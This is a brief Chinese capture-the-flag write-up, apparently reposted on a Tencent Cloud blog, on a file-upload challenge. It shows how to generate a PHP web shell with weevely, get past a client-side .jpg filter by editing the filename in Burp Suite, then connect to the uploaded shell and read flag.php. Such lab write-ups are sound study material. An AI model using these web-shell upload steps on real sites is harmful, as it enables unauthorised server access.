上传漏洞
上传漏洞
首先,标题是upload, 提示就是上传漏洞 无非就是js拦截,代码拦截,看了以下 网页head头,发现js代码,关键字jpg
- burpsuite 抓包,配置代理
- weevely 生成一句话
weevely generate password ./1.php #use weevely在当前目录生成1.php,密码passwd
mv 1.php 1.php.jpg- 选择文件上传 && burpsuite 抓包 删掉.jpg
- 回显 upload success : upload/1592555994.1.php
- weevely 连接
weevely http://220.249.52.133:57535/upload/1592554838.1.php password # weevely 连接
dir # 显示目录
cd ../..
发现flag.php
cat flag.php得到flag
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2021-02-25,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录
腾讯云开发者
